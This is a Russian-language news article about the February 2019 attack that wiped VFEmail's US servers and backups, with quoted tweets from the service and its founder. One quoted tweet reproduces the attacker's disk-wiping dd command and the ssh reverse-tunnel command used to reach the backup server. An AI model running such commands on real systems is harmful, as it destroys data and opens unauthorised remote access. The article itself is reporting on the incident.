Информационная безопасностьНовости

Хакеры уничтожили данные почтового сервиса VFEmail

Представители защищенного почтового сервиса VFEmail сообщили, что, скорее всего их ресурсу пришел конец, и он вряд ли снова заработает в полном объеме. Дело в том, что в минувший понедельник, 11 февраля 2019 года, неизвестные злоумышленники проникли на американские серверы проекта и уничтожили там все данные, до которых только смогли добраться.

At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provideer were intact, and service should be up there.

— VFEmail.net (@VFEmail) February 11, 2019

Not ‘A’, an entire infrastructure.

Mail hasts, VM hosts,sql server cluster, hosted vms.

If they all had one password, sure, but they didn’t. That’s the scary part.

— Havokmon (@Havokmon) February 12, 2019

Представители VFEmail пишут, что взломщики буквально отформатировали диски на всех машинах, и в результате были потеряны все виртуальные машины, все бекапы и файловый сервер.

«Да, VFEmail практически уничтожен. Скорее всего, он уже не вернется. Никогда не думал, что кого-то будет настолько волновать мой безвозмездный труд, что его захотят целиком и полностью  уничтожить», — пишет основатель VFEmail, Рик Ромеро (Rick Romero) у себя в Twitter.

В настоящее время специалисты VFEmail пытаются хотя бы частично восстановить работу сервиса. Судя по обновляющемуся сообщению на главной странице официального сайта, отправка писем уже частично работает (по крайней мере, для платных пользователей), однако американские пользователи обнаружат свои аккаунты девственно чистыми, и их данные, судя по всему, восстановить уже не удастся. Также пока не функционируют кастомные фильтры, проверки на спам и так далее.

Сообщается, что взломщики не пытались шантажировать владельцев сервиса и требовать выкуп. Судя по всему, уничтожение данных являлось основной целью этой странной атаки. В Twitter Ромеро подчеркивает, что пострадавшие части инфраструктуры VFEmail не имели одинаковых или слабых паролей. Что именно сделали злоумышленники и как сумели нанести VFEmail такой урон, пока еще только предстоит выяснить.

This is not looking good. All externally facing systems, of differing OS’s and remote authentication, in multiple data centers are down.

— VFEmail.net (@VFEmail) February 11, 2019

Caught the perp in the middle of formatting the backup server:

dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559

via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null [email protected] -R 127.0.0.1:30081:127.0.0.1:22 -N

— VFEmail.net (@VFEmail) February 11, 2019

Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.

— VFEmail.net (@VFEmail) February 11, 2019

Фото: Depositphotos

Ваш e-mail не будет опубликован. Он потребуется для подтверждения Вашего поста.
Оформление текста Нажмите «Ввод», чтобы отправить ответ.